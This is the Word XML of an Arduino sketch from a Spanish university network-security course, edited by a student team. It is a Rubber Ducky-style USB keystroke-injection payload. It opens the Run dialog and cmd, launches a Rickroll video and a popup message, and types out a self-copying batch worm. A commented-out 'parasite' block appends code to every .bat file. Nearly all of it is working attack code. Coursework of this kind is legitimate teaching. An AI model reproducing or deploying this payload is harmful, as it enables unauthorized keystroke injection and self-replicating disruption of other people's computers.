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AD1A" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1366AD1E" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> * SEGURIDAD EN SISTEMAS Y REDES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650C1650" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> * Borja </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bordel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> borja.bordel@upm.es</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC0E0AB" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> * EJEMPLO RUBBER DUCKY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177BF49" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> * Alterado por equipo Gryffindor CIT31-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F23213" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B780BF2" w14:textId="5AA6E3B9" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> * PAYLOAD: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bomba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>youtube</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> roll con gusano</w:t>
      </w:r>
      <w:r w:rsidR="00576F50">
        <w:t xml:space="preserve"> y posible parásito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276F254C" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> *  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF69B0A" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> *  IMPORTANTE: Todo el código debe estar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A6C4F2" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DE4A90" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="0ADF3734" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> // Librería para convertir nuestro Arduino en un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teclad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305584E8" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> #include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keyboard.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD888E7" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D08F0D8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B0C49A9" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  //30 segundos (30K ms) para que haya tiempo de desconectar en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RubberDuckdy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> del PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2172C544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100000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0698B2" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="571CBA15" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  // Importamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>layaout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en castellano para el teclado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B942B" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keyboard.begin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KeyboardLayout_es_ES</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310FF59C" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E4028" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  //Minimizamos las ventanas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71001A3E" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  Minimiza ();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFBA2F4" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="6FA729CD" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  //PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFBA264" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  //Ventana de "Ejecutar" para poder lanzar aplicaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2291DF86" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ejecutar(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138E1A2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0E34E869" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  //Teclea("https://www.youtube.com/watch?v=dQw4w9WgXcQ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC4AE7B" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  Teclea("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>notepad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A667035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46EBA50D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300); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5927D10B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cmd.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B6D5C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AEF3E82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iexplore.exe -new https://www.youtube.com/watch?v=dQw4w9WgXcQ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DE421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1C65BD34" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>*  Teclea</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> firefox.exe -new-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> https://www.youtube.com/watch?v=dQw4w9WgXcQ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06182712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 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F9356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-new https://www.youtube.com/watch?v=dQw4w9WgXcQ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4341D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20B02FA1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https://www.youtube.com/watch?v=dQw4w9WgXcQ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221FE6F7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3CEC6367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msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>We're</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no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love</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AE3FCE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ED2B66C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 xml:space="preserve">"set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localNuev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AD3F59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15642BAD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copy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> programita.bat programitaCopia.bat");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC465E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95458AC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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localNuev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DA6DC5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DB1C347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move</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> programitaCopia.bat %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localNuev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%/programita.bat");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579D7B25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4F8A1A20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"cd %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localNuev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>%");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001915BF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D63E4E0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5C5050D2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103981E7" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  Teclea("cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093926D4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7093576C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5F8DC437" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  /*POR NO JOROBAR TODO EL SISTEMA*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD6718" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> /*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0358D9E4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copy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> programita.bat programitaCopia.bat");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ABAEF6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F63D083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move</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> programitaCopia.bat ../programita.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342ED77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399C975E" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  Teclea("cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4767C046" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  // CODIGO PARASITO -- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ademas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hace que cada ejecución de programa cree programas </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> grandes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72482713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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /b *.bat &gt;&gt; archiv.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55100873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3210A0D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for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /F %%A in (archiv.txt) DO </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pro.bat &gt;&gt; %%A");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058B929B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683FDC7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20ABA159" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735995F1" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDA2ABF" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guardarBlocNotas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A6C651" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  Teclea("programita.bat");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312DE99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35F2973B" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>guardarBlocNotasComo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A091D1" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abrirDirExplorer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4906E188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14:paraId="2806F9BF" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  Teclea("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA7D7F9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78153F26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22490E2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2FD72683" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A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6BED4575" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A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88E797E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14:paraId="5CD77E1C" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DDFDF" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  //IMPORTANTE: Si dejamos el teclado iniciado, el procesador se bloquea y no se podrá programar de nuevo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795256D5" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  //NO olvides esta sentencia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DA2E00" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Keyboard.end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23A352" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013D5B28" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="29DEC342" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>//IMPORTANTE: ¡¡Debe queda vacío!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F57785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20F705AB" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA132E9" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="262ADA8E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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550F3F1E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(KEY_RETURN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F55151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123D6E17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(KEY_RETURN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B51DC7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144448B1" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA56946" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="56C45408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gramStart"/>
      <w:r>
        <w:t>Cerrar(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D89A30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(KEY_LEFT_ALT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449FF0C3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(KEY_F4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E45410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4079C0E1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(KEY_LEFT_ALT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E95421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(KEY_F4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274D280B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5605EE5C" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C961A63" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="657F0F12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gramStart"/>
      <w:r>
        <w:t>Teclea(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txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56720DD7" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keyboard.print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7089C4F3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705581EE" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6677C8" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="450DF1EC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gramStart"/>
      <w:r>
        <w:t>Ejecutar(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4306C267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(KEY_LEFT_GUI);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755CB0D2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('r');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF86C76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7865D497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(KEY_LEFT_GUI);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75998A15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('r');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5330C1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78822FF4" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3576ADA9" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="24F0F65A" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Minimiza () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2798E3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(KEY_LEFT_GUI);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49210D2A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('d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1402CFCA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4AEA2F74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(KEY_LEFT_GUI);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152B6264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('d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A435C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53A700A1" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D00305" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="6F10AB2F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r>
        <w:t>RestableceVentanas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D841824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(KEY_LEFT_ALT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9F16D5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(KEY_TAB);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153BF007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3773FFC1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(KEY_LEFT_ALT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78276654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(KEY_TAB);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D8ED7" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AD9E5B" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A"/>
    <w:p w14:paraId="76A0D123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r>
        <w:t>guardarBlocNotas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128421E1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(KEY_LEFT_CTRL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72147972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('g');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1683F9E9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60171DE9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(KEY_LEFT_CTRL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E34B4F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('g');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD0378" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0AF07A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r>
        <w:t>guardarBlocNotasComo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B86902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(KEY_LEFT_CTRL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA1791F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 xml:space="preserve">(KEY_LEFT_SHIFT);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB07CCB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('s');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B04C1E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2664E29B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(KEY_LEFT_CTRL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075627A2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(KEY_LEFT_SHIFT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B24BB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('s');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFCDA38" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014C90B5" w14:textId="77777777" w:rsidR="002A736A" w:rsidRDefault="002A736A" w:rsidP="002A736A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abrirDirExplorer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715814B1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(KEY_LEFT_ALT);</w:t>
      </w:r>
